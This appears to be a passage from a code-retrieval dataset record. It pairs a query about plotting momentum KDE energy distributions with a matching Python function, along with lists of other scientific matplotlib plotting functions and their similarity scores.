scalarmappable = cm.ScalarMappable(norm=normalize, cmap=colormap)\n scalarmappable.set_array(steps)\n fig.colorbar(scalarmappable,label=r'Number of snapshots', ax=ax0)\n ax0.set_ylabel(r\"P(k) [mK$^2$ Mpc$^{3}]$\")\n ax0.set_xlabel(r\"k [Mpc$^{-1}]$\")\n ax1.plot(steps, np.array(variances), label=\"Variance\")\n ax1.set_ylabel(r\"Variance(P(k)) [mK$^4$ Mpc$^{6}]$\")\n ax1.set_xlabel(u\"Number of 5° snapshots\")\n ax3.plot(steps, means, label=\"Mean\")\n ax3.set_ylabel(r\"Mean(P(k)) [mK$^2$ Mpc$^{3}]$\")\n ax3.set_xlabel(u\"Number of 5° snapshots\")\n ax1.legend()\n ax3.legend()\n im = ax2.imshow(np.array(pks)[:,0:Nkbins-5], aspect='auto')#, norm=mcolors.LogNorm())\n fig.colorbar(im, ax=ax2)\n print('Fractional deviation: ', np.mean(np.abs(pk - dV*sig**2)))\n pl.show()", "def plotERP(self, ep):\n import os \n import matplotlib.pyplot as plt\n \n try:\n filename = ep.filename.split('\\\\')[-1].split('.fif')[0]\n filename = 'plotsEEG_'+filename.split('_')[0] \n except Exception as err: \n filename = 'plots_eeg_file' \n print(err) \n finally:\n print('Saving ERP plots at >>>>', os.getcwd())\n \n try:\n os.mkdir(os.path.join(os.getcwd(), filename)) \n os.chdir(os.path.join(os.getcwd(), filename)) \n except Exception as err:\n print(err) \n \n \n ep = ep.interpolate_bads(reset_bads='True', mode = 'accurate')\n ep.info['bads'] = []\n \n ep.plot_psd(area_mode='range',fmin=0, fmax=40, tmax=10.0).savefig(filename + '_psd')\n\n# picks = ['FC2', 'C4', 'Cz', 'C5', 'FC1'] \n \n ep.plot_image(picks = None, cmap='interactive', sigma=1) \n \n plt.savefig(filename + '_image') \n \n bands = [(0, 4, 'Delta'), (4, 8, 'Theta'), (8, 12, 'Alpha'),\n (12, 30, 'Beta'), (30, 45, 'Gamma')] \n \n ep.plot_psd_topomap(bands=bands, vmin=None, vmax=None, \n tmin=0, tmax=0.5).savefig(filename + '_psd_topo')\n \n ep.plot_sensors().savefig(filename + '_sensors_') \n \n ep.plot_topo_image(vmin=-25, vmax=25, title='ERF images', sigma=3.,\n fig_facecolor='w', font_color='k').savefig(filename + '_image_topo') \n \n ep.average().plot().savefig(filename + 'erp_average_')\n ep.average().plot_image().savefig(filename + '_erp_average_image')\n print('Saving ERP plots at >>>>', os.getcwd())", "def app(ngr=100,c2a=1.6235):\n import matplotlib.pyplot as plt\n\n ## small donuts\n # plt.gcf().clf()\n grs = main(mu=0,ngrains=ngr,tilt_1=30.,sigma=15)\n plt.gcf().savefig('small_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='sm_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## Big donuts\n grs = main(mu=0,ngrains=ngr,tilt_1=50.,sigma=15)\n plt.gcf().savefig('big_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='big_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (30).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=30.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-30.,sigma=45)\n plt.gcf().clf()\n grs =[]\n for i in range(len(gr1)):\n grs.append(gr1[i])\n grs.append(gr2[i])\n grs=np.array(grs)\n mypf=upf.polefigure(grains=grs,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t30.pdf',bbox_inches='tight')\n f = gen_file(lab='dbl_lets_30',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (50).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=50.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-50.,sigma=45)\n plt.gcf().clf()\n gr =[]\n for i in range(len(gr1)):\n gr.append(gr1[i])\n gr.append(gr2[i])\n gr=np.array(gr)\n mypf=upf.polefigure(grains=gr,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t50.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='dbl_lets_50',ngr=ngr)\n write_gr(f,gr)", "def plot_plateau(x,y,p,n,Vdc):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlabel('Vrf [V]')\n ax.set_ylabel('Current [nA]')\n fig.suptitle('Vdc = '+str(Vdc)+' n = '+str(n), fontsize=24)\n \n plt.plot(x,y,'x',label='Experimental data') \n t = np.linspace(min(x),max(x),1000)\n plt.plot(t,f(t,p[0],p[1],p[2]),label='Fit')\n plt.axhline(y=n*e*frequency*1e9, color='black', linestyle='-')\n\n ax.legend()\n plt.show(block=True)\n plt.pause(0.3)\n plt.close()\n \n return None", "def _kde_example(data):\n # Plot the data\n ch = chartify.Chart(blank_labels=True, y_axis_type=\"density\")\n ch.set_title(\"KDE plot\")\n ch.plot.kde(data_frame=data, values_column=\"unit_price\", color_column=\"fruit\")\n ch.show(_OUTPUT_FORMAT)", "def test_lightcurve_seismology_plot():\n KeplerLightCurveFile(TABBY_Q8).PDCSAP_FLUX.periodogram().plot()", "def figure2():\n # sim_data_XPP = pd.read_csv(\"XPP.dat\", delimiter=\" \", header=None) # Load the XPP simulation\n\n plot_settings = {'y_limits': [-25, 0],\n 'x_limits': None,\n 'y_ticks': [-25, -20, -15, -10, -5, 0],\n 'locator_size': 2.5,\n 'y_label': 'Current (nA)',\n 'x_ticks': [],\n 'scale_size': 0,\n 'x_label': \"\",\n 'scale_loc': 4,\n 'figure_name': 'figure_2',\n 'legend': ['I-Na', 'I-NaP'],\n 'legend_size': 8,\n 'y_on': True}\n\n t, y = solver(100) # Integrate solution\n t_short = np.where((t >= 8) & (t <= 18))[0] # shorter time bounds for plots A and C\n v, m, h, m_nap, h_na_p, n, m_t, h_t, m_p, m_n, h_n, z_sk, m_a, h_a, m_h, ca = y[:, ].T # Extract all variables\n\n \"\"\"\n Explicitly calculate all currents: Extra constants duplicated from function dydt to calculate currents\n \"\"\"\n g_na_bar = 0.7\n g_nap_bar = 0.05\n g_k_bar = 1.3\n g_p_bar = 0.05\n g_leak = 0.005\n g_a_bar = 1.0\n e_na = 60\n e_k = -80\n e_leak = -50\n e_ca = 40\n g_t_bar = 0.1\n g_n_bar = 0.05\n g_sk_bar = 0.3\n\n \"\"\"\n Calculate currents used in the plot\n \"\"\"\n i_na = g_na_bar * (m ** 3) * h * (v - e_na)\n i_na_p = g_nap_bar * m_nap * h_na_p * (v - e_na)\n i_k = g_k_bar * (n ** 4) * (v - e_k)\n i_leak = g_leak * (v - e_leak)\n i_t = g_t_bar * m_t * h_t * (v - e_ca)\n i_n = g_n_bar * m_n * h_n * (v - e_ca)\n i_p = g_p_bar * m_p * (v - e_ca)\n i_sk = g_sk_bar * (z_sk ** 2) * (v - e_k)\n i_a = g_a_bar * m_a * h_a * (v - e_k)\n\n plt.figure(figsize=(5, 3), dpi=96) # Create figure\n\n plt.subplot(2, 2, 1) # Generate subplot 1 (top left)\n plt.plot(t[t_short], i_na[t_short], 'k-')\n plt.plot(t[t_short], i_na_p[t_short], c='k', linestyle='dotted')\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 2) # Generate subplot 2 (top right)\n plt.plot(t, i_t + i_n + i_p, 'k-')\n plt.plot(t, i_t, c='k', linestyle='dotted')\n plt.plot(t, i_p, 'k--')\n plt.plot(t, i_n, 'k-.')\n\n plot_settings['y_limits'] = [-2.5, 0]\n plot_settings['y_ticks'] = [-2.5, -2, -1.5, -1, -0.5, 0]\n plot_settings['locator_size'] = 0.25\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-Ca', 'I-T', 'I-P', 'I-N']\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 3) # Generate subplot 3 (bottom left)\n plt.plot(t[t_short], i_k[t_short], 'k-')\n plt.plot(t[t_short], i_a[t_short], c='k', linestyle='dotted')\n plt.plot(t[t_short], i_leak[t_short], 'k-.')\n\n plot_settings['y_limits'] = [0, 25]\n plot_settings['y_ticks'] = [0, 5, 10, 15, 20, 25]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = \"Current (nA)\"\n plot_settings['legend'] = ['I-K', 'I-A', 'I-leak']\n plot_settings['scale_size'] = 2\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(2, 2, 4) # Generate subplot 4 (bottom left)\n\n plt.plot(t, i_sk, 'k-')\n # plt.plot(sim_data_XPP[0][900:]-200,sim_data_XPP[34][900:]) # Isk for XPP data\n\n plot_settings['y_limits'] = [0, 1]\n plot_settings['y_ticks'] = [0, 0.2, 0.4, 0.6, 0.8, 1]\n plot_settings['locator_size'] = 0.2\n plot_settings['y_label'] = \"\"\n plot_settings['legend'] = ['I-SK']\n plot_settings['scale_size'] = 20\n plot_settings['scale_loc'] = 2\n alter_figure(plot_settings, close=True) # Alter figure for publication", "def generate_plot(self):\r\n\t\tx, y = zip(*[p.p for p in self.universe])\r\n\t\tself.ax.cla()\r\n\t\tself.ax.plot(x, y, '.')\r\n\t\tself.ax.set_title('Universe at time: %d' % self.universe.time)\r\n\t\tself.ax.set_xlim([P_MU-4*P_STD, P_MU+4*P_STD])\r\n\t\tself.ax.set_ylim([P_MU-4*P_STD, P_MU+4*P_STD])", "def plot_proof_functions():\n\n def thm1_D(x):\n return abs(1 / (2 + x) - 3 / (5 + x)) + abs(1 / (2 + x) - 2 / (5 + x))\n\n def thm2_D(x):\n return abs(2 / (2 + x) - (1 / 2) / ((1 / 2) + x))\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 2, 1000)\n\n plt.plot(x, thm1_D(x))\n plt.xlim(0, 2)\n plt.ylim(0.15, 0.22)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 6, 0, 2, linestyles='dashed', colors='grey', alpha=0.5)\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm1_D.pdf', bbox_inches='tight')\n plt.xticks(range(3), range(3))\n plt.close()\n\n print(f'Saved plot to: plots/thm1_D.pdf')\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 5, 1000)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 3, 0, 5, linestyles='dashed', colors='grey', alpha=0.5)\n plt.plot(x, thm2_D(x))\n plt.xlim(0, 5)\n plt.ylim(0, 0.4)\n plt.xticks(range(6), range(6))\n\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm2_D.pdf', bbox_inches='tight')\n plt.close()\n\n print(f'Saved plot to: plots/thm2_D.pdf')" ]
[ "0.73927927", "0.7082678", "0.64685386", "0.6194481", "0.60984546", "0.6091529", "0.5944429", "0.5879228", "0.58678186", "0.5845622", "0.5829439", "0.5824676", "0.58108956", "0.5784534", "0.57618827", "0.57524467", "0.57417613", "0.57405406", "0.57309103", "0.57143843", "0.5704922", "0.56943214", "0.5686127", "0.56705725", "0.56550974", "0.5647726", "0.5636573", "0.5631705", "0.5630242", "0.56177676" ]
0.7817756
0
Make a energy plot for the momentum KDE of the lowfield, and fulldrift solutions.
def energy_kde_paperplot(fields,df): plt.figure() i = 0 colorList = ['dodgerblue','tomato'] lw = 2 meanE_2 = [] meanE_3 = [] mup = np.min(df['energy [eV]']) - pp.mu chi_0 = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(fields[0])) g_en_axis, _, _, _, _, _, _, _, _, _, _, _, _, _ = \ occupation_plotter.occupation_v_energy_sep(chi_0, df['energy [eV]'].values, df) plt.plot(g_en_axis - np.min(df['energy [eV]']), np.zeros(len(g_en_axis)), '-', color='black', lineWidth=lw,label='Equilibrium') for ee in fields: chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + "E_{:.1e}.npy".format(ee)) # meanE_2 = utilities.mean_energy(chi_2_i,df) g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \ occupation_plotter.occupation_v_energy_sep(chi_2_i, df['energy [eV]'].values, df) plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,'--',color = colorList[i],lineWidth=lw,label=r'Low Field {:.0f} '.format(ee/100)+r'$V \, cm^{-1}$') print(integrate.trapz(g_chiax,g_en_axis)) # plt.plot(meanE_2-np.min(df['energy [eV]']),0,'.') chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + "E_{:.1e}.npy".format(ee)) g_en_axis, g_ftot, g_chiax, g_f0ax, _, _, _, _, _, _, _, _,_,_ = \ occupation_plotter.occupation_v_energy_sep(chi_3_i, df['energy [eV]'].values, df) plt.plot(g_en_axis - np.min(df['energy [eV]']), g_chiax,color = colorList[i],lineWidth=lw,label=r'Full Drift {:.0f} '.format(ee/100)+r'$V \, cm^{-1}$') print(integrate.trapz(g_chiax,g_en_axis)) i = i + 1 # plt.plot(g_en_axis - np.min(df['energy [eV]']), g_f0ax, '--', color='black', lineWidth=lw,label=r'$f_0$') plt.legend() # plt.ylim([-0.02, 0.015]) plt.xlabel(r'Energy above CBM ($eV$)') plt.ylabel(r'Deviational occupation $\delta f_{\mathbf{k}}$ (norm.)') # plt.ylabel(r'$\delta f_{\mathbf{k}}/f_{\mathbf{k}}^0$') plt.savefig(pp.figureLoc+'energy_KDE.png', bbox_inches='tight',dpi=600) plt.figure() plt.plot(g_en_axis,g_chiax) plt.figure() Z, xedges, yedges = np.histogram2d(df['kx [1/A]']*chi_3_i,df['ky [1/A]']*chi_3_i) plt.pcolormesh(xedges, yedges, Z.T) from scipy.stats.kde import gaussian_kde g_inds,_,_ = utilities.gaas_split_valleys(df,False) g_df = df.loc[g_inds] x = g_df['kx [1/A]']*(chi_3_i[g_inds]+g_df['k_FD']) y = g_df['ky [1/A]']*(chi_3_i[g_inds]+g_df['k_FD']) # y = g_df['energy [eV]']*(chi_3_i[g_inds]+g_df['k_FD']) k = gaussian_kde(np.vstack([x, y])) xi, yi = np.mgrid[x.min():x.max():x.size ** 0.5 * 1j, y.min():y.max():y.size ** 0.5 * 1j] zi = k(np.vstack([xi.flatten(), yi.flatten()])) fig = plt.figure(figsize=(7, 8)) ax1 = fig.add_subplot(211) ax2 = fig.add_subplot(212) # alpha=0.5 will make the plots semitransparent ax1.pcolormesh(xi, yi, zi.reshape(xi.shape), alpha=0.5) ax2.contourf(xi, yi, zi.reshape(xi.shape), alpha=0.5) ax1.set_xlim(x.min(), x.max()) ax1.set_ylim(y.min(), y.max()) ax2.set_xlim(x.min(), x.max()) ax2.set_ylim(y.min(), y.max())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def momentum_kde2_paperplot(fields):\n plt.figure(figsize=(2.65, 2.5))\n ax = plt.axes([0.18, 0.17, 0.8, 0.8])\n colorList = [med_color, high_color]\n lw = 1.5\n i = 0\n meankx_2 = []\n meankx_3 = []\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color, label='Equilibrium')\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color)\n ax.axhline(0, color='black', linestyle='--', linewidth=0.5)\n # ax.axvline(0, color='gray', linewidth=0.8, alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n meankx_2.append(utilities.mean_kx(chi_2_i, electron_df))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n meankx_3.append(utilities.mean_kx(chi_3_i, electron_df))\n\n ax.plot(k_ax, kdist_2, '--', linewidth=lw, color=colorList[i], label='Cold '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n ax.plot(k_ax, kdist_3, '-', linewidth=lw,color=colorList[i], label='Warm '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n i = i + 1\n # ax.plot(k_ax, kdist_f0_3, '--', linewidth=lw, color='black', label=r'$f_0$')\n # ax.plot(meankx_2,np.mean(abs(kdist_2))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n # ax.plot(meankx_3,np.mean(abs(kdist_3))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))\n ax.locator_params(axis='y', nbins=6)\n ax.locator_params(axis='x', nbins=6)\n # ax.tick_params(direction='in')\n ax.set_xlim(-0.085, 0.081)\n\n plt.xlabel(r'$\\rm k_x \\, \\, (\\AA^{-1})$')\n plt.ylabel(r'Deviational occupation $\\rm \\Delta f_{\\mathbf{k}}$')\n # plt.grid(lw=0.8, linestyle='dotted')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n # plt.ylim([-1,1])\n plt.legend(frameon=False,prop={'size':different_small_size})\n plt.savefig(pp.figureLoc+'momentum_KDE2.png', dpi=600)", "def plot_energies(self):\n plt.plot(self.energies[0], self.energies[1])\n plt.xlabel('Time (s)')\n plt.ylabel('Energy (J)')\n plt.show()", "def momentum_kde_paperplot(fields):\n fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True)\n axisList = [ax1,ax2,ax3]\n i =0\n\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n textstr = r'$E_{k_x}\\, = \\, %.1f \\, V \\, cm^{-1}$' % ee_Vcm\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n axisList[i].fill(k_ax, kdist_2/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Cold '+r'$e^{-}$ '+r'$\\Delta f$',color='blue')\n axisList[i].fill(k_ax, kdist_3/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Warm '+r'$e^{-}$ '+r'$\\Delta f$',color='red')\n axisList[i].plot(k_ax, kdist_2/np.max(kdist_f0_2), '-', linewidth=1,color='blue')\n axisList[i].plot(k_ax, kdist_3/np.max(kdist_f0_2), '-', linewidth=1,color='red')\n axisList[i].plot(k_ax, kdist_f0_2/np.max(kdist_f0_2), '-', linewidth=1, label='Equilibrium Dist.',color='black')\n axisList[i].yaxis.set_major_formatter(FormatStrFormatter('%g'))\n axisList[i].locator_params(axis='y', nbins=3)\n axisList[i].locator_params(axis='x', nbins=5)\n axisList[i].set_xlim(-0.06,0.06)\n axisList[i].text(0.02, 0.92, textstr, transform=axisList[i].transAxes, verticalalignment='top', bbox=props)\n\n i = i+1\n plt.xlabel(r'$k_x \\, \\, (\\AA^{-1})$')\n ax2.set_ylabel('Occupation Probability (norm.)')\n axisList[0].legend(loc=\"upper right\")\n plt.savefig(pp.figureLoc+'momentum_KDE.png', bbox_inches='tight',dpi=600)", "def exposure_plots(self, energy=1000.):\n cfg = configuration.Configuration(os.path.expandvars('.'), quiet=True);\n exp = cfg.irfs.exposure(0, energy) \n hf = hpm.HPskyfun('front-1000 exp', exp, 64);\n expf = hf.getcol()\n emeanf = expf.mean()\n euw=hpm.HParray('FRONT exposure @ {} MeV / {:.2e}'.format(energy, emeanf), expf/emeanf)\n fig,ax=plt.subplots(figsize=(12,6))\n euw.plot(axes=ax,vmin=0.80,vmax=1.20, title=euw.name, \n cmap=plt.get_cmap('coolwarm')).grid(color='grey');\n\n return fig", "def plot_dereddening():\n extinction_coefficients = {'2365-2764-1': np.array([0.2622, 0.844]), '4109-638-1': np.array([0.0524, 0.1576]),\n '2058-56-1': np.array([0.0751, 0.248]), '3642-2459-1': np.array([0.1907, 0.608]),\n '3999-1391-1': np.array([0.3911, 1.2480]), '2607-1448-1': np.array([0.0430, 0.1310])}\n cepheids = {'2365-2764-1': np.array([0.959, 2.09]), '4109-638-1': np.array([0.705, 2.385]), '2058-56-1':\n np.array([1.222, 1.333]), '3642-2459-1': np.array([1.088, 2.0518]), '3999-1391-1':\n np.array([1.360, 1.2567]), '2607-1448-1': np.array([1.484, 0.6963])}\n periods = {'2365-2764-1': 1.61, '4109-638-1': 15.31, '2058-56-1': 63.08, '3642-2459-1': 1.86, '3999-1391-1': 24.98,\n '2607-1448-1': 8.54}\n max_periods = max(periods.values())\n\n new_positions_bv_mv = [] # in M_V vs B-V space\n colors = []\n theoretical_position = []\n for obj in extinction_coefficients.keys():\n # new_positions_bv_mv.append(cepheids[obj]-extinction_coefficients[obj])\n new_positions_bv_mv.append(cepheids[obj])\n colors.append(periods[obj]/max_periods)\n theoretical_position.append(-2.78*np.log10(periods[obj])-1.35)\n\n for pos in range(len(new_positions_bv_mv)):\n plt.scatter(new_positions_bv_mv[pos][0], new_positions_bv_mv[pos][1], marker='^', facecolor='w', s=40)\n plt.scatter(new_positions_bv_mv[pos][0], theoretical_position[pos], marker='o', facecolor='r', s=50)\n return new_positions_bv_mv, colors", "def energies():\n # Hardcoded initial values\n numsteps = 10000\n time_max = 1\n # Running the calculation in the solver class using the velocity verlet method\n # for better accuracy.\n verlet = solver(input_matrix, 'verlet', time_max, numsteps)\n output_matrix, KE, PE, AM = verlet.main()\n # Creating a simple time axis for plotting\n x = np.linspace(0, 1, numsteps+1)\n\n # Plotting kinetic energy over time\n plt.figure(1, figsize=(10, 10))\n plt.plot(x, KE)\n plt.suptitle('Total kinetic energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE'])\n\n # Plotting potential energy over time\n plt.figure(2, figsize=(10, 10))\n plt.plot(x, PE)\n plt.suptitle('Total potential energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE'])\n\n # Plotting total energy against time\n plt.figure(3, figsize=(10, 10))\n plt.plot(x, PE+KE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE+PE'])\n\n # Plotting angular momentum against time. print the amplitude to terminal\n amplitude = max(AM)-min(AM)\n print('Amplitude of angular momentum during 1 year: %g[AU²/yr²]' %(amplitude))\n plt.figure(4, figsize=(10, 10))\n plt.plot(x, AM)\n plt.suptitle('Total angular momentum in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²/yr²]', fontsize=16)\n plt.legend(['AM'])\n\n # Plotting the kinetic, potential and total energy against time to see\n # how great the variations are\n plt.figure(5, figsize=(10, 10))\n plt.plot(x, PE, x, KE, x, KE+PE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE', 'KE', 'KE+PE'])\n plt.show()", "def plot_kde():\n f, (ax1, ax2) = plt.subplots(1, 2, sharey=True, sharex=True)\n sns.kdeplot(data.data.numpy()[:,0], data.data.numpy()[:,1], color=\"r\", shade=True, ax=ax1)\n sns.kdeplot(dec_mean.data.numpy()[:,0], dec_mean.data.numpy()[:,1], color=\"b\", shade=True, ax=ax2)\n plt.show()\n plt.pause(1e-6)\n plt.gcf().clear()", "def plot_energy(self, color=['r','g','b','c','m','y','k'], mod = 'E0'):\n if not mpl: raise \"Problem with matplotib: Plotting not possible.\"\n f = plt.figure(figsize=(5,4), dpi=100)\n a = f.add_subplot(111)\n strainList= self.__structures.items()[0][1].strainList\n \n if len(strainList)<=5:\n kk=1\n ll=len(strainList)\n grid=[ll]\n elif len(strainList)%5 == 0:\n kk=len(strainList)/5\n ll=5\n grid=[5 for i in range(kk)]\n else:\n kk=len(strainList)/5+1\n ll=5\n grid=[5 for i in range(kk)]\n grid[-1]=len(strainList)%5\n \n \n n=1\n m=1\n j=0\n for stype in strainList:\n \n spl = '1'+str(len(strainList))+str(n)\n if (n-1)%5==0: m=0\n a = plt.subplot2grid((kk,ll), ((n-1)/5,m), colspan=1)\n \n \n \n fi=open(stype+'.energy','w')\n \n #self.search_for_failed()\n atoms = self.get_atomsByStraintype(stype)\n if self.__thermodyn and mod=='F':\n energy = [i.gsenergy+i.phenergy[100] for i in atoms]\n elif self.__thermodyn and mod=='E0':\n energy = [i.gsenergy for i in atoms]\n elif self.__thermodyn and mod=='Fvib':\n energy = [i.phenergy[100] for i in atoms]\n else:\n energy = [i.gsenergy for i in atoms]\n strain = [i.eta for i in atoms]\n \n ii=0\n for (e,s) in zip(energy,strain):\n if e==0.: \n energy.pop(ii); strain.pop(ii)\n ii-=1\n ii+=1\n #print stype, energy, [i.scale for i in atoms]\n plt.plot(strain, energy, '%s*'%color[j%7])\n \n k=0\n for st in strain:\n fi.write('%s %s \\n'%(st,energy[k]))\n k+=1\n fi.close()\n \n poly = np.poly1d(np.polyfit(strain,energy,self.__fitorder[j]))\n xp = np.linspace(min(strain), max(strain), 100)\n a.plot(xp, poly(xp),color[j%7],label=stype)\n \n a.set_title(stype)\n \n j+=1\n \n n+=1\n m+=1\n \n a.set_xlabel('strain')\n a.set_ylabel(r'energy in eV')\n #a.legend(title='Strain type:')\n \n return f", "def plot(self, num_levels=10):\n if num_levels == -1:\n num_levels = len(self.energies())\n print(self.energies(num_levels))\n figure(figsize=(20, 5))\n subplot(1, num_levels + 1, 1)\n self.plot_potential()\n #xlabel('$\\phi$')\n for ii, psi2D in enumerate(self.get_2Dpsis(num_levels)):\n subplot(1, num_levels + 1, ii + 2)\n #imshow(psi2D.real,extent=(self.x[0],self.x[-1],self.y[0],self.y[-1]),interpolation=\"None\",aspect='auto')\n imshow(psi2D.real, interpolation=\"None\", aspect='auto')\n xlabel(ii)", "def plot_energies(self, np = None, ax=None):\n if not ax:\n import matplotlib.pyplot as plt\n fig = plt.figure()\n ax = fig.add_subplot(111)\n else:\n fig = None\n if np:\n datas = self.results['energies'][np[0]:np[1]]\n else:\n datas = self.results['energies']\n ax.plot(range(len(datas)), datas, '-o')\n # ax.set_ylim([self.results['energies'][-1], self.results['energies'][0]])\n ax.set_xlabel('steps')\n ax.set_ylabel('energy [eV]')\n ax.set_title('Energy profile {0}'.format(self.prefix))\n plt.savefig('{0}.png'.format(self.prefix))", "def plotEnergiesOpt(monthlyData, optIdx):\n \n \n dummyRange = np.asarray(range(len(optIdx)))\n \n fig = plt.figure(figsize=(16, 8))\n \n plt.suptitle('Energy Comparison')\n ax1 = plt.subplot(1,1,1)\n plt.plot(monthlyData['H'][optIdx, dummyRange], label = 'H', color='r')\n plt.plot(monthlyData['C'][optIdx, dummyRange], label = 'C', color='b')\n plt.plot(monthlyData['L'][optIdx, dummyRange], label = 'L', color='g')\n plt.plot(monthlyData['PV'][optIdx, dummyRange], label = 'PV', color='c')\n plt.plot(monthlyData['E_HCL'][optIdx, dummyRange], label = 'HCL', color='m')\n plt.plot(monthlyData['E_tot'][optIdx, dummyRange], label = 'E_tot', color='k')\n plt.ylabel('Energy [kWh]')\n plt.xlim(0,288)\n\n# plt.legend()\n \n majorLocator = MultipleLocator(24)\n majorFormatter = FormatStrFormatter('%d')\n minorLocator = MultipleLocator(4)\n minorFormatter = FormatStrFormatter('%d')\n\n ax1.xaxis.set_major_locator(majorLocator)\n ax1.xaxis.set_major_formatter(majorFormatter)\n ax1.xaxis.set_minor_locator(minorLocator)\n# ax1.xaxis.set_minor_formatter(minorFormatter)\n plt.grid(True, which=u'major')\n \n # Shrink current axis by 20%\n box = ax1.get_position()\n ax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n \n # Put a legend to the right of the current axis\n ax1.legend(loc='upper left', 